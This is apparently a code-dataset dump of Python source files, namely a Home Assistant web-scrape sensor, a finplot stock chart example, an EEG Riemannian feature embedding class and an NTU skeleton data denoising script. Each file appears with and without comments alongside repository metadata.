vol.Optional(CONF_USERNAME): cv.string,
vol.Optional(CONF_VALUE_TEMPLATE): cv.string,
vol.Optional(CONF_VERIFY_SSL, default=DEFAULT_VERIFY_SSL): cv.boolean,
}
)
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigType,
async_add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
_LOGGER.warning(
"Loading Scrape via platform setup has been deprecated in Home Assistant 2022.7 "
"Your configuration has been automatically imported and you can "
"remove it from your configuration.yaml"
)
if config.get(CONF_VALUE_TEMPLATE):
template: Template = Template(config[CONF_VALUE_TEMPLATE])
template.ensure_valid()
config[CONF_VALUE_TEMPLATE] = template.template
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_IMPORT},
data=config,
)
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
name: str = entry.options[CONF_NAME]
resource: str = entry.options[CONF_RESOURCE]
select: str | None = entry.options.get(CONF_SELECT)
attr: str | None = entry.options.get(CONF_ATTRIBUTE)
index: int = int(entry.options[CONF_INDEX])
unit: str | None = entry.options.get(CONF_UNIT_OF_MEASUREMENT)
device_class: str | None = entry.options.get(CONF_DEVICE_CLASS)
state_class: str | None = entry.options.get(CONF_STATE_CLASS)
value_template: str | None = entry.options.get(CONF_VALUE_TEMPLATE)
entry_id: str = entry.entry_id
val_template: Template | None = None
if value_template is not None:
val_template = Template(value_template, hass)
rest = hass.data[DOMAIN][entry.entry_id]
async_add_entities(
[
ScrapeSensor(
rest,
name,
select,
attr,
index,
val_template,
unit,
device_class,
state_class,
entry_id,
resource,
)
],
True,
)
class ScrapeSensor(SensorEntity):
_attr_icon = ICON
def __init__(
self,
rest: RestData,
name: str,
select: str | None,
attr: str | None,
index: int,
value_template: Template | None,
unit: str | None,
device_class: str | None,
state_class: str | None,
entry_id: str,
resource: str,
) -> None:
self.rest = rest
self._attr_native_value = None
self._select = select
self._attr = attr
self._index = index
self._value_template = value_template
self._attr_name = name
self._attr_native_unit_of_measurement = unit
self._attr_device_class = device_class
self._attr_state_class = state_class
self._attr_unique_id = entry_id
self._attr_device_info = DeviceInfo(
entry_type=DeviceEntryType.SERVICE,
identifiers={(DOMAIN, entry_id)},
manufacturer="Scrape",
name=name,
configuration_url=resource,
)
def _extract_value(self) -> Any:
raw_data = BeautifulSoup(self.rest.data, "lxml")
_LOGGER.debug(raw_data)
try:
if self._attr is not None:
value = raw_data.select(self._select)[self._index][self._attr]
else:
tag = raw_data.select(self._select)[self._index]
if tag.name in ("style", "script", "template"):
value = tag.string
else:
value = tag.text
except IndexError:
_LOGGER.warning("Index '%s' not found in %s", self._attr, self.entity_id)
value = None
except KeyError:
_LOGGER.warning(
"Attribute '%s' not found in %s", self._attr, self.entity_id
)
value = None
_LOGGER.debug(value)
return value
async def async_update(self) -> None:
await self.rest.async_update()
await self._async_update_from_rest_data()
async def async_added_to_hass(self) -> None:
await self._async_update_from_rest_data()
async def _async_update_from_rest_data(self) -> None:
if self.rest.data is None:
_LOGGER.error("Unable to retrieve data for %s", self.name)
return
value = await self.hass.async_add_executor_job(self._extract_value)
if self._value_template is not None:
self._attr_native_value = (
self._value_template.async_render_with_possible_json_value(value, None)
)
else:
self._attr_native_value = value
| true
| true
|
1c44747e85ccb4efd346c533db7efda9c279aaae
| 142
|
py
|
Python
|
python-pyqt/Section02/finplot_mod/01.py
|
sharebook-kr/learningspoons-bootcamp-finance
|
0288f3f3b39f54420e4e9987f1de12892dc680ea
|
[
"MIT"
] | 9
|
2020-10-25T15:13:32.000Z
|
2022-03-26T11:27:21.000Z
|
python-pyqt/Section02/finplot_mod/01.py
|
sharebook-kr/learningspoons-bootcamp-finance
|
0288f3f3b39f54420e4e9987f1de12892dc680ea
|
[
"MIT"
] | null | null | null |
python-pyqt/Section02/finplot_mod/01.py
|
sharebook-kr/learningspoons-bootcamp-finance
|
0288f3f3b39f54420e4e9987f1de12892dc680ea
|
[
"MIT"
] | 7
|
2021-03-01T11:06:45.000Z
|
2022-03-14T07:06:04.000Z
|
import finplot as fplt
import yfinance
df = yfinance.download('AAPL')
fplt.candlestick_ochl(df[['Open', 'Close', 'High', 'Low']])
fplt.show()
| 23.666667
| 59
| 0.711268
|
import finplot as fplt
import yfinance
df = yfinance.download('AAPL')
fplt.candlestick_ochl(df[['Open', 'Close', 'High', 'Low']])
fplt.show()
| true
| true
|
1c44752cff7dde1bc65d8065a410394ce0f2c6ff
| 3,306
|
py
|
Python
|
code/spatial_embedding.py
|
guangyizhangbci/EEG_Riemannian
|
2d301bf3d06a192da2829c1c54b24d388ddea1dd
|
[
"MIT"
] | 12
|
2022-02-22T17:15:04.000Z
|
2022-03-19T11:41:15.000Z
|
code/spatial_embedding.py
|
guangyizhangbci/RFNet
|
2d301bf3d06a192da2829c1c54b24d388ddea1dd
|
[
"MIT"
] | null | null | null |
code/spatial_embedding.py
|
guangyizhangbci/RFNet
|
2d301bf3d06a192da2829c1c54b24d388ddea1dd
|
[
"MIT"
] | null | null | null |
from __future__ import print_function, division
import numpy as np
from sklearn.preprocessing import StandardScaler
import pyriemann
from pyriemann.estimation import Covariances
from library.spfiltering import ProjCommonSpace
from library.featuring import Riemann
class spatial_features():
def __init__(self, config, dataset, rieman_flag, rank_num):
self.rieman_flag = rieman_flag # Use Riemannian or Not
self.rank_num = rank_num # rank of a convariance matrix
self.dataset = dataset # Dataset name
self.config = config # Dataset specfic configuration dictionary
def tangentspace_learning(self, spoc):
''' Learning Processing: from Riemannian Space to Tangent Space '''
geom = Riemann(n_fb=1, metric='riemann').transform(spoc)
scaler = StandardScaler()
scaler.fit(geom)
sc = scaler.transform(geom)
return sc
def projection(self, X_train, X_test, rieman_flag, rank_num):
'''Estimation of covariance matrix'''
cov_train = Covariances('oas').transform(X_train)
cov_train = cov_train[:, None, :, :]
cov_test = Covariances('oas').transform(X_test)
cov_test = cov_test[:, None, :, :]
if self.rieman_flag==False:
''' Direct vectorization of spatial covariance matrices without Riemannian '''
sc_train = NaiveVec(method='upper').transform(cov_train)
sc_test = NaiveVec(method='upper').transform(cov_test)
else:
# spoc = ProjSPoCSpace(n_compo=n_compo, scale='auto')
'''Dimensionality Reduction'''
spoc = ProjCommonSpace(rank_num=rank_num)
# spoc = ProjSPoCSpace(rank_num=rank_num, scale='auto')
spoc_train = spoc.fit(cov_train).transform(cov_train)
spoc_test = spoc.fit(cov_train).transform(cov_test)
# sc_train = spoc_train[:,0,:,:]
# sc_test = spoc_test[:,0,:,:]
'''Dimensionality Reduction'''
sc_train = self.tangentspace_learning(spoc_train)
sc_test = self.tangentspace_learning(spoc_test)
return sc_train, sc_test
def embedding(self, X_train, X_test):
train_embed = []
test_embed = []
'''
Concatenate spatial embeddings from each frequency band
'''
for freqband_band in range(0, self.config[self.dataset]['Band_No']):
X_training = X_train[:,freqband_band,:,:]
X_testing = X_test[:,freqband_band,:,:]
train_embedding, test_embedding = self.projection(X_training, X_testing, self.rieman_flag, self.rank_num)
train_embed.append(train_embedding)
test_embed.append(test_embedding)
train_embed = np.asarray(train_embed)
test_embed = np.asarray(test_embed)
train_embed = np.transpose(train_embed, [1, 0, 2])
test_embed = np.transpose(test_embed, [1, 0, 2])
train_embed = np.reshape(train_embed, (train_embed.shape[0],train_embed.shape[1]*train_embed.shape[2]))# concatenate feature from different EEG bandds
test_embed = np.reshape(test_embed, (test_embed.shape[0], test_embed.shape[1]*test_embed.shape[2]))
return train_embed, test_embed
#
| 34.8
| 158
| 0.645796
|
from __future__ import print_function, division
import numpy as np
from sklearn.preprocessing import StandardScaler
import pyriemann
from pyriemann.estimation import Covariances
from library.spfiltering import ProjCommonSpace
from library.featuring import Riemann
class spatial_features():
def __init__(self, config, dataset, rieman_flag, rank_num):
self.rieman_flag = rieman_flag
self.rank_num = rank_num
self.dataset = dataset
self.config = config
def tangentspace_learning(self, spoc):
geom = Riemann(n_fb=1, metric='riemann').transform(spoc)
scaler = StandardScaler()
scaler.fit(geom)
sc = scaler.transform(geom)
return sc
def projection(self, X_train, X_test, rieman_flag, rank_num):
cov_train = Covariances('oas').transform(X_train)
cov_train = cov_train[:, None, :, :]
cov_test = Covariances('oas').transform(X_test)
cov_test = cov_test[:, None, :, :]
if self.rieman_flag==False:
sc_train = NaiveVec(method='upper').transform(cov_train)
sc_test = NaiveVec(method='upper').transform(cov_test)
else:
'''Dimensionality Reduction'''
spoc = ProjCommonSpace(rank_num=rank_num)
spoc_train = spoc.fit(cov_train).transform(cov_train)
spoc_test = spoc.fit(cov_train).transform(cov_test)
'''Dimensionality Reduction'''
sc_train = self.tangentspace_learning(spoc_train)
sc_test = self.tangentspace_learning(spoc_test)
return sc_train, sc_test
def embedding(self, X_train, X_test):
train_embed = []
test_embed = []
for freqband_band in range(0, self.config[self.dataset]['Band_No']):
X_training = X_train[:,freqband_band,:,:]
X_testing = X_test[:,freqband_band,:,:]
train_embedding, test_embedding = self.projection(X_training, X_testing, self.rieman_flag, self.rank_num)
train_embed.append(train_embedding)
test_embed.append(test_embedding)
train_embed = np.asarray(train_embed)
test_embed = np.asarray(test_embed)
train_embed = np.transpose(train_embed, [1, 0, 2])
test_embed = np.transpose(test_embed, [1, 0, 2])
train_embed = np.reshape(train_embed, (train_embed.shape[0],train_embed.shape[1]*train_embed.shape[2]))
test_embed = np.reshape(test_embed, (test_embed.shape[0], test_embed.shape[1]*test_embed.shape[2]))
return train_embed, test_embed
| true
| true
|
1c4475e321d4980d398c6000935266e034bebe6a
| 18,502
|
py
|
Python
|
data/ntu/get_raw_denoised_data.py
|
mhrah7495/View-Adaptive-Neural-Networks-for-Skeleton-based-Human-Action-Recognition
|
4b91b79dff7363010300ef5fb1564a57a65ea7cf
|
[
"MIT"
] | 111
|
2019-09-19T08:07:17.000Z
|
2022-03-09T07:19:07.000Z
|
data/ntu/get_raw_denoised_data.py
|
Jagadish-Kumaran/View-Adaptive-Neural-Networks-for-Skeleton-based-Human-Action-Recognition
|
b2113aa6295d7292516d5a74582b619d775a5b3d
|
[
"MIT"
] | 14
|
2019-10-18T08:45:42.000Z
|
2021-11-04T06:38:40.000Z
|
data/ntu/get_raw_denoised_data.py
|
Jagadish-Kumaran/View-Adaptive-Neural-Networks-for-Skeleton-based-Human-Action-Recognition
|
b2113aa6295d7292516d5a74582b619d775a5b3d
|
[
"MIT"
] | 52
|
2019-09-18T11:54:47.000Z
|
2022-01-17T09:12:19.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import os
import os.path as osp
import numpy as np
import pickle
import logging
root_path = './'
raw_data_file = osp.join(root_path, 'raw_data', 'raw_skes_data.pkl')
save_path = osp.join(root_path, 'denoised_data')
if not osp.exists(save_path):
os.mkdir(save_path)
rgb_ske_path = osp.join(save_path, 'rgb+ske')
if not osp.exists(rgb_ske_path):
os.mkdir(rgb_ske_path)
actors_info_dir = osp.join(save_path, 'actors_info')
if not osp.exists(actors_info_dir):
os.mkdir(actors_info_dir)
missing_count = 0
noise_len_thres = 11
noise_spr_thres1 = 0.8
noise_spr_thres2 = 0.69754
noise_mot_thres_lo = 0.089925
noise_mot_thres_hi = 2
noise_len_logger = logging.getLogger('noise_length')
noise_len_logger.setLevel(logging.INFO)
noise_len_logger.addHandler(logging.FileHandler(osp.join(save_path, 'noise_length.log')))
noise_len_logger.info('{:^20}\t{:^17}\t{:^8}\t{}'.format('Skeleton', 'bodyID', 'Motion', 'Length'))
noise_spr_logger = logging.getLogger('noise_spread')
noise_spr_logger.setLevel(logging.INFO)
noise_spr_logger.addHandler(logging.FileHandler(osp.join(save_path, 'noise_spread.log')))
noise_spr_logger.info('{:^20}\t{:^17}\t{:^8}\t{:^8}'.format('Skeleton', 'bodyID', 'Motion', 'Rate'))
noise_mot_logger = logging.getLogger('noise_motion')
noise_mot_logger.setLevel(logging.INFO)
noise_mot_logger.addHandler(logging.FileHandler(osp.join(save_path, 'noise_motion.log')))
noise_mot_logger.info('{:^20}\t{:^17}\t{:^8}'.format('Skeleton', 'bodyID', 'Motion'))
fail_logger_1 = logging.getLogger('noise_outliers_1')
fail_logger_1.setLevel(logging.INFO)
fail_logger_1.addHandler(logging.FileHandler(osp.join(save_path, 'denoised_failed_1.log')))
fail_logger_2 = logging.getLogger('noise_outliers_2')
fail_logger_2.setLevel(logging.INFO)
fail_logger_2.addHandler(logging.FileHandler(osp.join(save_path, 'denoised_failed_2.log')))
missing_skes_logger = logging.getLogger('missing_frames')
missing_skes_logger.setLevel(logging.INFO)
missing_skes_logger.addHandler(logging.FileHandler(osp.join(save_path, 'missing_skes.log')))
missing_skes_logger.info('{:^20}\t{}\t{}'.format('Skeleton', 'num_frames', 'num_missing'))
missing_skes_logger1 = logging.getLogger('missing_frames_1')
missing_skes_logger1.setLevel(logging.INFO)
missing_skes_logger1.addHandler(logging.FileHandler(osp.join(save_path, 'missing_skes_1.log')))
missing_skes_logger1.info('{:^20}\t{}\t{}\t{}\t{}\t{}'.format('Skeleton', 'num_frames', 'Actor1',
'Actor2', 'Start', 'End'))
missing_skes_logger2 = logging.getLogger('missing_frames_2')
missing_skes_logger2.setLevel(logging.INFO)
missing_skes_logger2.addHandler(logging.FileHandler(osp.join(save_path, 'missing_skes_2.log')))
missing_skes_logger2.info('{:^20}\t{}\t{}\t{}'.format('Skeleton', 'num_frames', 'Actor1', 'Actor2'))
def denoising_by_length(ske_name, bodies_data):
"""
Denoising data based on the frame length for each bodyID.
Filter out the bodyID which length is less or equal than the predefined threshold.
"""
noise_info = str()
new_bodies_data = bodies_data.copy()
for (bodyID, body_data) in new_bodies_data.items():
length = len(body_data['interval'])
if length <= noise_len_thres:
noise_info += 'Filter out: %s, %d (length).\n' % (bodyID, length)
noise_len_logger.info('{}\t{}\t{:.6f}\t{:^6d}'.format(ske_name, bodyID,
body_data['motion'], length))
del bodies_data[bodyID]
if noise_info != '':
noise_info += '\n'
return bodies_data, noise_info
def get_valid_frames_by_spread(points):
"""
Find the valid (or reasonable) frames (index) based on the spread of X and Y.
:param points: joints or colors
"""
num_frames = points.shape[0]
valid_frames = []
for i in range(num_frames):
x = points[i, :, 0]
y = points[i, :, 1]
if (x.max() - x.min()) <= noise_spr_thres1 * (y.max() - y.min()): # 0.8
valid_frames.append(i)
return valid_frames
def denoising_by_spread(ske_name, bodies_data):
"""
Denoising data based on the spread of Y value and X value.
Filter out the bodyID which the ratio of noisy frames is higher than the predefined
threshold.
bodies_data: contains at least 2 bodyIDs
"""
noise_info = str()
denoised_by_spr = False # mark if this sequence has been processed by spread.
new_bodies_data = bodies_data.copy()
# for (bodyID, body_data) in bodies_data.items():
for (bodyID, body_data) in new_bodies_data.items():
if len(bodies_data) == 1:
break
valid_frames = get_valid_frames_by_spread(body_data['joints'].reshape(-1, 25, 3))
num_frames = len(body_data['interval'])
num_noise = num_frames - len(valid_frames)
if num_noise == 0:
continue
ratio = num_noise / float(num_frames)
motion = body_data['motion']
if ratio >= noise_spr_thres2: # 0.69754
del bodies_data[bodyID]
denoised_by_spr = True
noise_info += 'Filter out: %s (spread rate >= %.2f).\n' % (bodyID, noise_spr_thres2)
noise_spr_logger.info('%s\t%s\t%.6f\t%.6f' % (ske_name, bodyID, motion, ratio))
else: # Update motion
joints = body_data['joints'].reshape(-1, 25, 3)[valid_frames]
body_data['motion'] = min(motion, np.sum(np.var(joints.reshape(-1, 3), axis=0)))
noise_info += '%s: motion %.6f -> %.6f\n' % (bodyID, motion, body_data['motion'])
# TODO: Consider removing noisy frames for each bodyID
if noise_info != '':
noise_info += '\n'
return bodies_data, noise_info, denoised_by_spr
def denoising_by_motion(ske_name, bodies_data, bodies_motion):
"""
Filter out the bodyID which motion is out of the range of predefined interval
"""
# Sort bodies based on the motion, return a list of tuples
# bodies_motion = sorted(bodies_motion.items(), key=lambda x, y: cmp(x[1], y[1]), reverse=True)
bodies_motion = sorted(bodies_motion.items(), key=lambda x: x[1], reverse=True)
# Reserve the body data with the largest motion
denoised_bodies_data = [(bodies_motion[0][0], bodies_data[bodies_motion[0][0]])]
noise_info = str()
for (bodyID, motion) in bodies_motion[1:]:
if (motion < noise_mot_thres_lo) or (motion > noise_mot_thres_hi):
noise_info += 'Filter out: %s, %.6f (motion).\n' % (bodyID, motion)
noise_mot_logger.info('{}\t{}\t{:.6f}'.format(ske_name, bodyID, motion))
else:
denoised_bodies_data.append((bodyID, bodies_data[bodyID]))
if noise_info != '':
noise_info += '\n'
return denoised_bodies_data, noise_info
def denoising_bodies_data(bodies_data):
"""
Denoising data based on some heuristic methods, not necessarily correct for all samples.
Return:
denoised_bodies_data (list): tuple: (bodyID, body_data).
"""
ske_name = bodies_data['name']
bodies_data = bodies_data['data']
# Step 1: Denoising based on frame length.
bodies_data, noise_info_len = denoising_by_length(ske_name, bodies_data)
if len(bodies_data) == 1: # only has one bodyID left after step 1
return bodies_data.items(), noise_info_len
# Step 2: Denoising based on spread.
bodies_data, noise_info_spr, denoised_by_spr = denoising_by_spread(ske_name, bodies_data)
if len(bodies_data) == 1:
return bodies_data.items(), noise_info_len + noise_info_spr
bodies_motion = dict() # get body motion
for (bodyID, body_data) in bodies_data.items():
bodies_motion[bodyID] = body_data['motion']
# Sort bodies based on the motion
# bodies_motion = sorted(bodies_motion.items(), key=lambda x, y: cmp(x[1], y[1]), reverse=True)
bodies_motion = sorted(bodies_motion.items(), key=lambda x: x[1], reverse=True)
denoised_bodies_data = list()
for (bodyID, _) in bodies_motion:
denoised_bodies_data.append((bodyID, bodies_data[bodyID]))
return denoised_bodies_data, noise_info_len + noise_info_spr
# TODO: Consider denoising further by integrating motion method
# if denoised_by_spr: # this sequence has been denoised by spread
# bodies_motion = sorted(bodies_motion.items(), lambda x, y: cmp(x[1], y[1]), reverse=True)
# denoised_bodies_data = list()
# for (bodyID, _) in bodies_motion:
# denoised_bodies_data.append((bodyID, bodies_data[bodyID]))
# return denoised_bodies_data, noise_info
# Step 3: Denoising based on motion
# bodies_data, noise_info = denoising_by_motion(ske_name, bodies_data, bodies_motion)
# return bodies_data, noise_info
def get_one_actor_points(body_data, num_frames):
"""
Get joints and colors for only one actor.
For joints, each frame contains 75 X-Y-Z coordinates.
For colors, each frame contains 25 x 2 (X, Y) coordinates.
"""
joints = np.zeros((num_frames, 75), dtype=np.float32)
colors = np.ones((num_frames, 1, 25, 2), dtype=np.float32) * np.nan
start, end = body_data['interval'][0], body_data['interval'][-1]
joints[start:end + 1] = body_data['joints'].reshape(-1, 75)
colors[start:end + 1, 0] = body_data['colors']
return joints, colors
def remove_missing_frames(ske_name, joints, colors):
"""
Cut off missing frames which all joints positions are 0s
For the sequence with 2 actors' data, also record the number of missing frames for
actor1 and actor2, respectively (for debug).
"""
num_frames = joints.shape[0]
num_bodies = colors.shape[1] # 1 or 2
if num_bodies == 2: # DEBUG
missing_indices_1 = np.where(joints[:, :75].sum(axis=1) == 0)[0]
missing_indices_2 = np.where(joints[:, 75:].sum(axis=1) == 0)[0]
cnt1 = len(missing_indices_1)
cnt2 = len(missing_indices_2)
start = 1 if 0 in missing_indices_1 else 0
end = 1 if num_frames - 1 in missing_indices_1 else 0
if max(cnt1, cnt2) > 0:
if cnt1 > cnt2:
info = '{}\t{:^10d}\t{:^6d}\t{:^6d}\t{:^5d}\t{:^3d}'.format(ske_name, num_frames,
cnt1, cnt2, start, end)
missing_skes_logger1.info(info)
else:
info = '{}\t{:^10d}\t{:^6d}\t{:^6d}'.format(ske_name, num_frames, cnt1, cnt2)
missing_skes_logger2.info(info)
# Find valid frame indices that the data is not missing or lost
# For two-subjects action, this means both data of actor1 and actor2 is missing.
valid_indices = np.where(joints.sum(axis=1) != 0)[0] # 0-based index
missing_indices = np.where(joints.sum(axis=1) == 0)[0]
num_missing = len(missing_indices)
if num_missing > 0: # Update joints and colors
joints = joints[valid_indices]
colors[missing_indices] = np.nan
global missing_count
missing_count += 1
missing_skes_logger.info('{}\t{:^10d}\t{:^11d}'.format(ske_name, num_frames, num_missing))
return joints, colors
def get_bodies_info(bodies_data):
bodies_info = '{:^17}\t{}\t{:^8}\n'.format('bodyID', 'Interval', 'Motion')
for (bodyID, body_data) in bodies_data.items():
start, end = body_data['interval'][0], body_data['interval'][-1]
bodies_info += '{}\t{:^8}\t{:f}\n'.format(bodyID, str([start, end]), body_data['motion'])
return bodies_info + '\n'
def get_two_actors_points(bodies_data):
"""
Get the first and second actor's joints positions and colors locations.
# Arguments:
bodies_data (dict): 3 key-value pairs: 'name', 'data', 'num_frames'.
bodies_data['data'] is also a dict, while the key is bodyID, the value is
the corresponding body_data which is also a dict with 4 keys:
- joints: raw 3D joints positions. Shape: (num_frames x 25, 3)
- colors: raw 2D color locations. Shape: (num_frames, 25, 2)
- interval: a list which records the frame indices.
- motion: motion amount
# Return:
joints, colors.
"""
ske_name = bodies_data['name']
label = int(ske_name[-2:])
num_frames = bodies_data['num_frames']
bodies_info = get_bodies_info(bodies_data['data'])
bodies_data, noise_info = denoising_bodies_data(bodies_data) # Denoising data
bodies_info += noise_info
bodies_data = list(bodies_data)
if len(bodies_data) == 1: # Only left one actor after denoising
if label >= 50: # DEBUG: Denoising failed for two-subjects action
fail_logger_2.info(ske_name)
bodyID, body_data = bodies_data[0]
joints, colors = get_one_actor_points(body_data, num_frames)
bodies_info += 'Main actor: %s' % bodyID
else:
if label < 50: # DEBUG: Denoising failed for one-subject action
fail_logger_1.info(ske_name)
joints = np.zeros((num_frames, 150), dtype=np.float32)
colors = np.ones((num_frames, 2, 25, 2), dtype=np.float32) * np.nan
bodyID, actor1 = bodies_data[0] # the 1st actor with largest motion
start1, end1 = actor1['interval'][0], actor1['interval'][-1]
joints[start1:end1 + 1, :75] = actor1['joints'].reshape(-1, 75)
colors[start1:end1 + 1, 0] = actor1['colors']
actor1_info = '{:^17}\t{}\t{:^8}\n'.format('Actor1', 'Interval', 'Motion') + \
'{}\t{:^8}\t{:f}\n'.format(bodyID, str([start1, end1]), actor1['motion'])
del bodies_data[0]
actor2_info = '{:^17}\t{}\t{:^8}\n'.format('Actor2', 'Interval', 'Motion')
start2, end2 = [0, 0] # initial interval for actor2 (virtual)
while len(bodies_data) > 0:
bodyID, actor = bodies_data[0]
start, end = actor['interval'][0], actor['interval'][-1]
if min(end1, end) - max(start1, start) <= 0: # no overlap with actor1
joints[start:end + 1, :75] = actor['joints'].reshape(-1, 75)
colors[start:end + 1, 0] = actor['colors']
actor1_info += '{}\t{:^8}\t{:f}\n'.format(bodyID, str([start, end]), actor['motion'])
# Update the interval of actor1
start1 = min(start, start1)
end1 = max(end, end1)
elif min(end2, end) - max(start2, start) <= 0: # no overlap with actor2
joints[start:end + 1, 75:] = actor['joints'].reshape(-1, 75)
colors[start:end + 1, 1] = actor['colors']
actor2_info += '{}\t{:^8}\t{:f}\n'.format(bodyID, str([start, end]), actor['motion'])
# Update the interval of actor2
start2 = min(start, start2)
end2 = max(end, end2)
del bodies_data[0]
bodies_info += ('\n' + actor1_info + '\n' + actor2_info)
with open(osp.join(actors_info_dir, ske_name + '.txt'), 'w') as fw:
fw.write(bodies_info + '\n')
return joints, colors
def get_raw_denoised_data():
"""
Get denoised data (joints positions and color locations) from raw skeleton sequences.
For each frame of a skeleton sequence, an actor's 3D positions of 25 joints represented
by an 2D array (shape: 25 x 3) is reshaped into a 75-dim vector by concatenating each
3-dim (x, y, z) coordinates along the row dimension in joint order. Each frame contains
two actor's joints positions constituting a 150-dim vector. If there is only one actor,
then the last 75 values are filled with zeros. Otherwise, select the main actor and the
second actor based on the motion amount. Each 150-dim vector as a row vector is put into
a 2D numpy array where the number of rows equals the number of valid frames. All such
2D arrays are put into a list and finally the list is serialized into a cPickle file.
For the skeleton sequence which contains two or more actors (mostly corresponds to the
last 11 classes), the filename and actors' information are recorded into log files.
For better understanding, also generate RGB+skeleton videos for visualization.
"""
with open(raw_data_file, 'rb') as fr: # load raw skeletons data
raw_skes_data = pickle.load(fr)
num_skes = len(raw_skes_data)
print('Found %d available skeleton sequences.' % num_skes)
raw_denoised_joints = []
raw_denoised_colors = []
frames_cnt = []
for (idx, bodies_data) in enumerate(raw_skes_data):
ske_name = bodies_data['name']
print('Processing %s' % ske_name)
num_bodies = len(bodies_data['data'])
if num_bodies == 1: # only 1 actor
num_frames = bodies_data['num_frames']
body_data = list(bodies_data['data'].values())[0]
joints, colors = get_one_actor_points(body_data, num_frames)
else: # more than 1 actor, select two main actors
joints, colors = get_two_actors_points(bodies_data)
# Remove missing frames
joints, colors = remove_missing_frames(ske_name, joints, colors)
num_frames = joints.shape[0] # Update
# Visualize selected actors' skeletons on RGB videos.
raw_denoised_joints.append(joints)
raw_denoised_colors.append(colors)
frames_cnt.append(num_frames)
if (idx + 1) % 1000 == 0:
print('Processed: %.2f%% (%d / %d), ' % \
(100.0 * (idx + 1) / num_skes, idx + 1, num_skes) + \
'Missing count: %d' % missing_count)
raw_skes_joints_pkl = osp.join(save_path, 'raw_denoised_joints.pkl')
with open(raw_skes_joints_pkl, 'wb') as f:
pickle.dump(raw_denoised_joints, f, pickle.HIGHEST_PROTOCOL)
raw_skes_colors_pkl = osp.join(save_path, 'raw_denoised_colors.pkl')
with open(raw_skes_colors_pkl, 'wb') as f:
pickle.dump(raw_denoised_colors, f, pickle.HIGHEST_PROTOCOL)
frames_cnt = np.array(frames_cnt, dtype=np.int)
np.savetxt(osp.join(save_path, 'frames_cnt.txt'), frames_cnt, fmt='%d')
print('Saved raw denoised positions of {} frames into {}'.format(np.sum(frames_cnt),
raw_skes_joints_pkl))
print('Found %d files that have missing data' % missing_count)
if __name__ == '__main__':
get_raw_denoised_data()
| 42.242009
| 101
| 0.649822
|
import os
import os.path as osp
import numpy as np
import pickle
import logging
root_path = './'
raw_data_file = osp.join(root_path, 'raw_data', 'raw_skes_data.pkl')
save_path = osp.join(root_path, 'denoised_data')
if not osp.exists(save_path):
os.mkdir(save_path)
rgb_ske_path = osp.join(save_path, 'rgb+ske')
if not osp.exists(rgb_ske_path):
os.mkdir(rgb_ske_path)
actors_info_dir = osp.join(save_path, 'actors_info')
if not osp.exists(actors_info_dir):
os.mkdir(actors_info_dir)
missing_count = 0
noise_len_thres = 11
noise_spr_thres1 = 0.8
noise_spr_thres2 = 0.69754
noise_mot_thres_lo = 0.089925
noise_mot_thres_hi = 2
noise_len_logger = logging.getLogger('noise_length')
noise_len_logger.setLevel(logging.INFO)
noise_len_logger.addHandler(logging.FileHandler(osp.join(save_path, 'noise_length.log')))
noise_len_logger.info('{:^20}\t{:^17}\t{:^8}\t{}'.format('Skeleton', 'bodyID', 'Motion', 'Length'))
noise_spr_logger = logging.getLogger('noise_spread')
noise_spr_logger.setLevel(logging.INFO)
noise_spr_logger.addHandler(logging.FileHandler(osp.join(save_path, 'noise_spread.log')))
noise_spr_logger.info('{:^20}\t{:^17}\t{:^8}\t{:^8}'.format('Skeleton', 'bodyID', 'Motion', 'Rate'))
noise_mot_logger = logging.getLogger('noise_motion')
noise_mot_logger.setLevel(logging.INFO)
noise_mot_logger.addHandler(logging.FileHandler(osp.join(save_path, 'noise_motion.log')))
noise_mot_logger.info('{:^20}\t{:^17}\t{:^8}'.format('Skeleton', 'bodyID', 'Motion'))
fail_logger_1 = logging.getLogger('noise_outliers_1')
fail_logger_1.setLevel(logging.INFO)
fail_logger_1.addHandler(logging.FileHandler(osp.join(save_path, 'denoised_failed_1.log')))
fail_logger_2 = logging.getLogger('noise_outliers_2')
fail_logger_2.setLevel(logging.INFO)
fail_logger_2.addHandler(logging.FileHandler(osp.join(save_path, 'denoised_failed_2.log')))
missing_skes_logger = logging.getLogger('missing_frames')
missing_skes_logger.setLevel(logging.INFO)
missing_skes_logger.addHandler(logging.FileHandler(osp.join(save_path, 'missing_skes.log')))
missing_skes_logger.info('{:^20}\t{}\t{}'.format('Skeleton', 'num_frames', 'num_missing'))
missing_skes_logger1 = logging.getLogger('missing_frames_1')
missing_skes_logger1.setLevel(logging.INFO)
missing_skes_logger1.addHandler(logging.FileHandler(osp.join(save_path, 'missing_skes_1.log')))
missing_skes_logger1.info('{:^20}\t{}\t{}\t{}\t{}\t{}'.format('Skeleton', 'num_frames', 'Actor1',
'Actor2', 'Start', 'End'))
missing_skes_logger2 = logging.getLogger('missing_frames_2')
missing_skes_logger2.setLevel(logging.INFO)
missing_skes_logger2.addHandler(logging.FileHandler(osp.join(save_path, 'missing_skes_2.log')))
missing_skes_logger2.info('{:^20}\t{}\t{}\t{}'.format('Skeleton', 'num_frames', 'Actor1', 'Actor2'))
def denoising_by_length(ske_name, bodies_data):
noise_info = str()
new_bodies_data = bodies_data.copy()
for (bodyID, body_data) in new_bodies_data.items():
length = len(body_data['interval'])
if length <= noise_len_thres:
noise_info += 'Filter out: %s, %d (length).\n' % (bodyID, length)
noise_len_logger.info('{}\t{}\t{:.6f}\t{:^6d}'.format(ske_name, bodyID,
body_data['motion'], length))
del bodies_data[bodyID]
if noise_info != '':
noise_info += '\n'
return bodies_data, noise_info
def get_valid_frames_by_spread(points):
num_frames = points.shape[0]
valid_frames = []
for i in range(num_frames):
x = points[i, :, 0]
y = points[i, :, 1]
if (x.max() - x.min()) <= noise_spr_thres1 * (y.max() - y.min()):
valid_frames.append(i)
return valid_frames
def denoising_by_spread(ske_name, bodies_data):
noise_info = str()
denoised_by_spr = False
new_bodies_data = bodies_data.copy()
for (bodyID, body_data) in new_bodies_data.items():
if len(bodies_data) == 1:
break
valid_frames = get_valid_frames_by_spread(body_data['joints'].reshape(-1, 25, 3))
num_frames = len(body_data['interval'])
num_noise = num_frames - len(valid_frames)
if num_noise == 0:
continue
ratio = num_noise / float(num_frames)
motion = body_data['motion']
